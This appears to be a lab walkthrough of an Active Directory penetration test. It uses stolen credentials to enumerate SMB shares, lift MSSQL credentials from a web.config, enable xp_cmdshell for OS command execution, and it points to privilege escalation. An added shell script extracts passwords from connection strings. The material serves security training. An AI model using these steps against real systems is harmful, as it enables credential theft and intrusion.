Credentials obtained
We have the username and password for a new user.
The next step is more enumeration. The question asks: 'Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file?'
That points at file shares, so let's start with smbmap, authenticating as the new user, to list the shares on 172.16.7.3 and the permissions that account has on each of them:
smbmap -u BR086 -p Welcome1 -H 172.16.7.3
[+] IP: 172.16.7.3:445 Name: inlanefreight.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
Department Shares READ ONLY Share for department users
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
The NETLOGON and SYSVOL shares tell us this host is a domain controller, and NO ACCESS on ADMIN$ and C$ confirms our user is not a local administrator there. The only non-default share we can read is Department Shares, so let's list it recursively first:
smbmap -u BR086 -p Welcome1 -H 172.16.7.3 -R "Department Shares"
[+] IP: 172.16.7.3:445 Name: inlanefreight.local
Disk Permissions Comment
---- ----------- -------
Department Shares READ ONLY
.\Department Shares\*
dr--r--r-- 0 Fri Apr 1 11:04:17 2022 .
dr--r--r-- 0 Fri Apr 1 11:04:17 2022 ..
dr--r--r-- 0 Fri Apr 1 11:04:51 2022 Accounting
dr--r--r-- 0 Fri Apr 1 11:04:46 2022 Executives
dr--r--r-- 0 Fri Apr 1 11:04:41 2022 Finance
dr--r--r-- 0 Fri Apr 1 11:04:25 2022 HR
dr--r--r-- 0 Fri Apr 1 11:04:19 2022 IT
dr--r--r-- 0 Fri Apr 1 11:04:35 2022 Marketing
dr--r--r-- 0 Fri Apr 1 11:04:30 2022 R&D
.\Department Shares\Accounting\*
dr--r--r-- 0 Fri Apr 1 11:04:51 2022 .
dr--r--r-- 0 Fri Apr 1 11:04:51 2022 ..
dr--r--r-- 0 Fri Apr 1 11:05:17 2022 Private
dr--r--r-- 0 Fri Apr 1 11:04:54 2022 Public
.\Department Shares\Executives\*
dr--r--r-- 0 Fri Apr 1 11:04:46 2022 .
dr--r--r-- 0 Fri Apr 1 11:04:46 2022 ..
dr--r--r-- 0 Fri Apr 1 11:05:15 2022 Private
dr--r--r-- 0 Fri Apr 1 11:04:49 2022 Public
.\Department Shares\Finance\*
dr--r--r-- 0 Fri Apr 1 11:04:41 2022 .
dr--r--r-- 0 Fri Apr 1 11:04:41 2022 ..
dr--r--r-- 0 Fri Apr 1 11:05:12 2022 Private
dr--r--r-- 0 Fri Apr 1 11:04:43 2022 Public
.\Department Shares\HR\*
dr--r--r-- 0 Fri Apr 1 11:04:25 2022 .
dr--r--r-- 0 Fri Apr 1 11:04:25 2022 ..
dr--r--r-- 0 Fri Apr 1 11:05:04 2022 Private
dr--r--r-- 0 Fri Apr 1 11:04:27 2022 Public
.\Department Shares\IT\*
dr--r--r-- 0 Fri Apr 1 11:04:19 2022 .
dr--r--r-- 0 Fri Apr 1 11:04:19 2022 ..
dr--r--r-- 0 Fri Apr 1 11:04:56 2022 Private
dr--r--r-- 0 Fri Apr 1 11:04:22 2022 Public
.\Department Shares\IT\Private\*
dr--r--r-- 0 Fri Apr 1 11:04:56 2022 .
dr--r--r-- 0 Fri Apr 1 11:04:56 2022 ..
dr--r--r-- 0 Fri Apr 1 11:04:59 2022 Development
.\Department Shares\IT\Private\Development\*
dr--r--r-- 0 Fri Apr 1 11:04:59 2022 .
dr--r--r-- 0 Fri Apr 1 11:04:59 2022 ..
fr--r--r-- 1203 Fri Apr 1 11:05:02 2022 web.config
.\Department Shares\Marketing\*
dr--r--r-- 0 Fri Apr 1 11:04:35 2022 .
dr--r--r-- 0 Fri Apr 1 11:04:35 2022 ..
dr--r--r-- 0 Fri Apr 1 11:05:10 2022 Private
dr--r--r-- 0 Fri Apr 1 11:04:38 2022 Public
.\Department Shares\R&D\*
dr--r--r-- 0 Fri Apr 1 11:04:30 2022 .
dr--r--r-- 0 Fri Apr 1 11:04:30 2022 ..
dr--r--r-- 0 Fri Apr 1 11:05:07 2022 Private
dr--r--r-- 0 Fri Apr 1 11:04:33 2022 Public
The recursive listing turns up a single file: web.config under IT\Private\Development. web.config is the IIS/ASP.NET application configuration file, and it commonly carries database connection strings (with credentials) in its <connectionStrings> section, which is exactly what the question describes. Let's download it with smbmap's -A option, which takes a filename pattern and automatically downloads every match found during the recursive listing, by adding -A web.config to the -R command above.
Opening the file gives the MSSQL connection string and, with it, both the username and the password for the SQL database; the password is the answer to the question. Let's authenticate with Impacket's mssqlclient.py using those credentials (this is a SQL login from the connection string, so no -windows-auth is needed).
Once we are in, mssqlclient.py's enable_xp_cmdshell command switches on the xp_cmdshell extended stored procedure, which requires sysadmin rights on the SQL instance and runs commands as the SQL Server service account. After that we can run OS commands in the format xp_cmdshell whoami /priv. It is worth reading that output carefully: a service account holding SeImpersonatePrivilege is a common route to SYSTEM on the host.
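For the step of reading the credentials out of web.config, here is an added example (not code from the original walkthrough) that pulls the server, user and password out of every entry in a <connectionStrings> section. The config it runs on is constructed for this example, and the host, database, user and password values in it are placeholders, not values from the target. It handles both the long SqlClient key names (Data Source / User ID / Password) and the short ones (Server / UID / PWD), which is the case a grep for "password" alone would miss.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: pull MSSQL credentials
# out of the <connectionStrings> section of a web.config. The config below is
# constructed for this example; host, database, user and password values are
# placeholders, not values taken from the target.

SAMPLE_WEB_CONFIG='<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <connectionStrings>
    <add name="ReportServer"
         connectionString="Server=sql01.example.local,1433;Database=reports;User ID=svc_reports;Password=Pl@ceh0lder1"
         providerName="System.Data.SqlClient" />
    <add name="Legacy"
         connectionString="data source=sql02;initial catalog=legacy;uid=legacy_app;pwd=Pl@ceh0lder2"
         providerName="System.Data.SqlClient" />
  </connectionStrings>
</configuration>'

# extract_mssql_creds < web.config
# Prints one line per connection string: "<name> <server> <user> <password>".
# Keys are matched case-insensitively because SqlClient accepts both the long
# form (Data Source / User ID / Password) and the short form (Server / UID / PWD).
extract_mssql_creds() {
    # flatten the XML so each <add .../> element is on one line, then keep
    # only the elements that carry a connectionString attribute
    tr '\n' ' ' |
    grep -o '<add [^>]*connectionString="[^"]*"[^>]*>' |
    while IFS= read -r add; do
        name=$(printf '%s' "$add" | sed -n 's/.*[[:space:]]name="\([^"]*\)".*/\1/p')
        cs=$(printf '%s' "$add" | sed -n 's/.*connectionString="\([^"]*\)".*/\1/p')
        server=''; user=''; password=''
        # split the connection string on ';' without letting the shell glob
        old_ifs=$IFS; IFS=';'; set -f
        for pair in $cs; do
            key=$(printf '%s' "${pair%%=*}" | tr 'A-Z' 'a-z' | sed 's/^ *//;s/ *$//')
            value=${pair#*=}        # keeps any '=' inside the password itself
            case "$key" in
                server|'data source'|address|addr|'network address') server=$value ;;
                'user id'|uid|user) user=$value ;;
                password|pwd) password=$value ;;
            esac
        done
        IFS=$old_ifs; set +f
        # Integrated Security (Windows auth) strings carry no SQL login or
        # password; mark them so they are not mistaken for an empty parse
        [ -n "$user" ] || user='<integrated>'
        [ -n "$password" ] || password='<none>'
        printf '%s %s %s %s\n' "$name" "$server" "$user" "$password"
    done
}

printf '%s\n' "$SAMPLE_WEB_CONFIG" | extract_mssql_creds
```

Against a real download, run it as `extract_mssql_creds < web.config`. The server value is what you pass to mssqlclient.py as the target, and a comma in it (sql01.example.local,1433) is SqlClient's host,port syntax, so split it before passing -port.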